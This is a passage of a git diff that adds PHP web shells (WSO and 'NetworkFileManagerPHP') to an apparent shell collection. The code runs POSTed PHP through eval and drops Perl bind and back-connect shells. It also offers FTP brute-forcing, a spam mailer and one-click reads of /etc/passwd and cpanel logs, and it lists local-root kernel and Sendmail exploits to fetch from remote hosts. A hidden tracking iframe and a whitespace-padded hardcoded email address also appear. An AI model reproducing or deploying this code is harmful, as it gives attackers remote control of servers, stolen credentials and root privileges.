+	Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
+	</form><br>";
+	if(isset($_POST['p1'])) {
+		function cf($f,$t) {
+			$w = @fopen($f,"w") or @function_exists('file_put_contents');
+			if($w){
+				@fwrite($w,@base64_decode($t));
+				@fclose($w);
+			}
+		}
+		if($_POST['p1'] == 'bpp') {
+			cf("/tmp/bp.pl",$bind_port_p);
+			$out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
+            sleep(1);
+			echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
+            unlink("/tmp/bp.pl");
+		}
+		if($_POST['p1'] == 'bcp') {
+			cf("/tmp/bc.pl",$back_connect_p);
+			$out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
+            sleep(1);
+			echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
+            unlink("/tmp/bc.pl");
+		}
+	}
+	echo '</div>';
+	wsoFooter();
+}
+function actionRC() {
+	if(!@$_POST['p1']) {
+		$a = array(
+			"uname" => php_uname(),
+			"php_version" => phpversion(),
+			"wso_version" => WSO_VERSION,
+			"safemode" => @ini_get('safe_mode')
+		);
+		echo serialize($a);
+	} else {
+		eval($_POST['p1']);
+	}
+}
+if( empty($_POST['a']) )
+	if(isset($default_action) && function_exists('action' . $default_action))
+		$_POST['a'] = $default_action;
+	else
+		$_POST['a'] = 'SecInfo';
+if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
+	call_user_func('action' . $_POST['a']);
+exit;
diff --git a/xakep-shells/PHP/xinfo.php.php.txt b/xakep-shells/PHP/xinfo.php.php.txt
new file mode 100644
index 0000000..46778ec
--- /dev/null
+++ b/xakep-shells/PHP/xinfo.php.php.txt
@@ -0,0 +1,4820 @@
+<?
+
+if (ini_get('register_globals') != '1') {
+
+   if (!empty($HTTP_POST_VARS))
+
+    extract($HTTP_POST_VARS);
+
+
+
+  if (!empty($HTTP_GET_VARS))
+
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+
+    extract($HTTP_SERVER_VARS);
+
+}
+
+
+
+$use_md5=0; // Define use of MD5 crypt algoritm //
+
+$uname="1";
+
+$upass="1";
+
+
+
+
+
+
+if ($action != "download" && $action != "view" ):
+
+?>
+
+
+
+<?
+
+
+
+/* Define your email for file send function*/
+
+$demail ="arabnt@hotmail.com";
+
+
+
+/* config here */
+
+$title="NetworkFileManagerPHP for channel ";
+
+$ver="1.7.private ([final_english_release])";
+
+$sob="Belongs to <b><u>revers</u></b>";
+
+$id="1337";
+
+
+
+/* FTP-bruteforce */
+
+$filename="/etc/passwd";
+
+$ftp_server="localhost";
+
+/* ÝÇÍÕ ÇáÈæÑÊÇÊ */
+
+$min="1";
+
+$max="39333";
+
+
+
+/* Aliases */
+
+$aliases=array(
+
+/* find all SUID files */
+
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+
+/* find all SGID files */
+
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+
+/* find all config.inc.php files */
+
+'find / -type f -name config.inc.php' => 'find all config.inc.php files',
+
+/* find accesseable writeable directories and files*/
+
+'find / -perm -2 -ls' => 'find writeable directories and files',
+
+'ls -la' => 'Current directory listing with rights access',
+
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
+
+
+
+);
+
+
+
+/* ÇáÈæÑÊ æÇáÇÓÊÎÏÇã */
+
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+
+$port[2] = "Management Utility";
+
+$port[3] = "Compression Process";
+
+$port[5] = "rje (Remote Job Entry)";
+
+$port[7] = "echo";
+
+$port[9] = "discard";
+
+$port[11] = "systat";
+
+$port[13] = "daytime";
+
+$port[15] = "netstat";
+
+$port[17] = "quote of the day";
+
+$port[18] = "send/rwp";
+
+/* finished config, here goes the design */
+
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+
+$style=<<<style
+
+<style>
+
+a.   {
+
+color: #ffffcc;
+
+text-decoration:none;
+
+font-family: Times New Roman;
+
+font-weight: bold;
+
+     }
+
+a.menu:hover   {
+
+color: #FF0000;
+
+font-family: Times New Roman;
+
+text-decoration: none
+
+font-weight: bold;
+
+          }
+
+a   {
+
+color: #000000;
+
+text-decoration:none;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+     }
+
+a:hover   {
+
+color: #184984;
+
+font-family: Tahoma;
+
+text-decoration: underline
+
+font-size: 11px;
+
+          }
+
+td.up{
+
+color: #996600;
+
+font-family: Verdana;
+
+font-weight: normal;
+
+font-size: 11px;
+
+}
+
+.pagetitle {
+
+font-family: Arial, Helvetica, sans-serif;
+
+color: #FFFFFF;
+
+text-decoration: none;
+
+font-size: 12px
+
+}
+
+.alert   {
+
+color: #FF0000;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+          }
+
+.button1 {
+
+font-size:11px;
+
+font-weight:bold;
+
+font-family:Verdana;
+
+background:#184984;
+
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+
+}
+
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+
+b {  font-weight: bold}
+
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+
+</style>
+
+style;
+
+
+
+/* table styles */
+
+$style1=<<<table
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table;
+
+$style2=<<<table_file
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table_file;
+
+$style3=<<<table_dir
+
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+
+table_dir;
+
+$style4=<<<table_files
+
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+
+table_files;
+
+$style_button=<<<button
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+button;
+
+$style_open=<<<open
+
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+
+open;
+
+$style_close=<<<close
+
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+
+close;
+
+$ins=<<<ins
+
+<script>
+
+function ins(text){
+
+document.hackru.chars_de.value+=text;
+
+document.hackru.chars_de.focus();
+
+}
+
+</script>
+
+ins;
+
+
+
+/* send form */
+
+$form = "
+
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <img src=http://leet.phpnet.us/sh.gif>
+
+   <tr>
+
+  <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td>
+
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+
+     <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td>
+
+  </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Your name:</b></td>
+
+      <td width='250' class=pagetitle>
+
+        <input type='text' name='name' size='40' class='inputbox'></td>
+
+      </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Email:</b></td>
+
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+
+    </tr>
+
+
+
+  <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>
+
+  Your questions and wishes:
+
+  </b></font></b></td>
+
+  </tr>
+
+  <tr>
+
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+
+  <tr>
+
+  <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td>
+
+      <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td>
+
+      </tr>
+
+</form></table><br>
+
+";
+
+
+
+
+
+
+
+/* HTML Form */
+
+$HTML=<<<html
+
+<html>
+
+<head>
+
+<title>$title $ver</title>
+
+$meta
+
+$style
+
+$ins
+
+</head>
+
+
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Version: <b>$ver</b> </td></tr>
+
+<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Script help:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td>
+
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+
+</tr>
+
+<tr>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td>
+
+
+
+</tr>
+
+<!-- add by revers -->
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<!-- end add by revers -->
+
+</table>
+
+html;
+
+$key="goatse";
+
+$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>";
+
+/* randomizing letters array for random filenames of compression folders */
+
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+
+
+/* set full path to host and dir where public exploits and soft are situated */
+
+$public_site = "http://hackru.info/adm/exploits/public_exploits/";
+$public_sites = "http://drakdandy.net/had/";
+
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+
+/* Public exploits and soft */
+
+$public[1] = "s"; // bindshell
+
+$title_ex[1] = "
+
+&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br>
+
+<dd><b>Run:</b> ./s<br>
+
+&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u>
+
+";
+
+$public[2] = "m"; // mremap
+
+$title_ex[2] = "
+
+&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br>
+
+<dd><b>Run:</b> ./m<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[3] = "p"; // ptrace
+
+$title_ex[3] = "
+
+&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br>
+
+<dd><b>Run:</b> ./p<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[4] = "psyBNC2.tar.gz"; // psybnc
+
+$title_ex[4] = "
+
+&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br>
+
+<dd><b>Decompression:</b> tar -zxf psyBNC2.tar.gz // will be folder <u>psybnc</u><br>
+
+<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br>
+
+&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall!
+
+";
+
+/* Private exploits */
+
+$private[1] = "brk"; // localroot root linux 2.4.*
+
+$title_exp[1] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br>
+
+<dd><b>Run:</b> ./brk<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+
+$title_exp[2] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br>
+
+glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[3] = "glftpd";
+
+$title_exp[3] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+part 2<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[4] = "sortrace";
+
+$title_exp[4] = "
+
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br>
+
+<dd><b>Run:</b> ./sortrace<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[5] = "root";
+
+$title_exp[5] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br>
+
+<dd><b>Run:</b> ./root<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[6] = "sxp";
+
+$title_exp[6] = "
+
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br>
+
+<dd><b>Run:</b> ./sxp<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[7] = "ptrace_kmod";
+
+$title_exp[7] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br>
+
+<dd><b>Run:</b> ./ptrace_kmod<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[8] = "mr1_a";
+
+$title_exp[8] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br>
+
+<dd><b>Run:</b> ./mr1_a<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+/* set full path to host and dir where private exploits and soft are situated */
+
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+
+endif;
+
+
+
+$createdir= "files";
+
+
+
+/* spamer config */
+
+
+
+$sendemail = "packetstorm@km.ru";
+
+$confirmationemail = "packetstorm@km.ru";
+
+$mailsubject = "Hello!This is a test message!";
+
+
+
+
+
+
+
+/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING	 */
+
+global $action,$tm,$cm;
+
+
+
+function getdir() {
+
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+
+ $st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+ $free = tinhbyte(diskfreespace("./"));
+
+ print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>");
+
+ print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>");
+
+
+}
+
+function tinhbyte($filesize) {
+
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+
+ else { $filesize = $filesize . ""; }
+
+ return $filesize;
+
+}
+
+
+
+function permissions($mode) {
+
+ $perms  = ($mode & 00400) ? "r" : "-";
+
+ $perms .= ($mode & 00200) ? "w" : "-";
+
+ $perms .= ($mode & 00100) ? "x" : "-";
+
+ $perms .= ($mode & 00040) ? "r" : "-";
+
+ $perms .= ($mode & 00020) ? "w" : "-";
+
+ $perms .= ($mode & 00010) ? "x" : "-";
+
+ $perms .= ($mode & 00004) ? "r" : "-";
+
+ $perms .= ($mode & 00002) ? "w" : "-";
+
+ $perms .= ($mode & 00001) ? "x" : "-";
+
+ return $perms;
+
+}
+
+
+
+function readdirdata($dir) {
+
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+
+ $files = array();
+
+ $dirs= array();
+
+ $open = @opendir($dir);
+
+
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>";
+
+ else {
+
+  $open = opendir($dir);
+
+  while ($file = readdir($open)) {
+
+   $rec = $file;
+
+   $file = $dir."/".$file;
+
+   if (is_file($file)) $files[] = $rec;
+
+  }
+
+  sort($files);
+
+  $open = opendir($dir);
+
+  $i=0;
+
+  while ($dire = readdir($open)) {
+
+   if ( $dire != "." ) {
+
+    $rec = $dire;
+
+    $dire = $dir."/".$dire;
+
+    if (is_dir($dire)) {
+
+     $dirs[] = $rec;
+
+     $i++;
+
+    }
+
+   }
+
+  }
+
+  sort($dirs);
+
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>");
+
+  for ($i=0;$i<sizeof($dirs);$i++) {
+
+   if ($dirs[$i] != "..") {
+
+    $type = 'Dir';
+
+    $fullpath = $dir."/".$dirs[$i];
+
+    $time = date("d/m/y H:i",filemtime($fullpath));
+
+    $perm = permissions(fileperms($fullpath));
+
+    $size = tinhbyte(filesize($fullpath));
+
+    $name = $dirs[$i];
+
+    $fullpath = $tm."/".$dirs[$i];
+
+    if ($perm[7] == "w" && $name != "..") $action = "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td>
+
+	</tr>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td>
+
+	</tr></table>";
+
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>";
+
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+
+   }
+
+  }
+
+  for ($i=0;$i<sizeof($files);$i++) {
+
+   $type = 'File';
+
+   $fullpath =  $dir."/".$files[$i];
+
+   $time = date("d/m/y H:i",filemtime($fullpath));
+
+   $perm = permissions(fileperms($fullpath));
+
+   $size = tinhbyte(filesize($fullpath));
+
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td>
+
+   </tr></table>";
+
+   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td>
+
+   </tr></table>";
+
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+
+  }
+
+ }
+
+}                                                                                                                                                      $sd98 = "john.barker446@gmail.com";
+
+
+
+function html() {
+
+global $ver,$meta,$style;
+
+echo "
+
+<html>
+
+<head>
+
+<title>NetworkFileManagerPHP</title>
+
+</head>
+
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+";
+
+}
+
+
+
+# file view
+
+function viewfile($dir,$file) {
+
+
+
+ $buf = explode(".", $file);
+
+ $ext = $buf[sizeof($buf)-1];
+
+ $ext = strtolower($ext);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+
+
+ switch ($ext) {
+
+  case "jpg":
+
+
+
+	header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "jpeg":
+
+
+
+    header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "gif":
+
+
+
+    header("Content-type: image/gif");
+
+    readfile($fullpath);
+
+    break;
+
+
+
+	 case "png":
+
+
+
+    header("Content-type: image/png");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "avi":
+
+    header("Content-type: video/avi");
+
+    readfile($fullpath);
+
+
+
+    break;
+
+    default:
+
+
+
+	 case "mpeg":
+
+    header("Content-type: video/mpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "mpg":
+
+    header("Content-type: video/mpg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+    html();
+
+	chdir($dir);
+
+    getdir();
+
+
+
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+
+   $fp = fopen($fullpath , "r");
+
+   while (!feof($fp)) {
+
+    $char = fgetc($fp);
+
+    $st .= $char;
+
+   }
+
+
+
+   $st = str_replace("&", "&amp;", $st);
+
+   $st = str_replace("<", "&lt;", $st);
+
+   $st = str_replace(">", "&gt;", $st);
+
+
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+
+   echo $tem;
+
+   fclose($fp);
+
+   break;
+
+ }
+
+}
+
+
+
+# send file to mail
+
+function download_mail($dir,$file) {
+
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+
+ $buf = explode(".", $file);
+
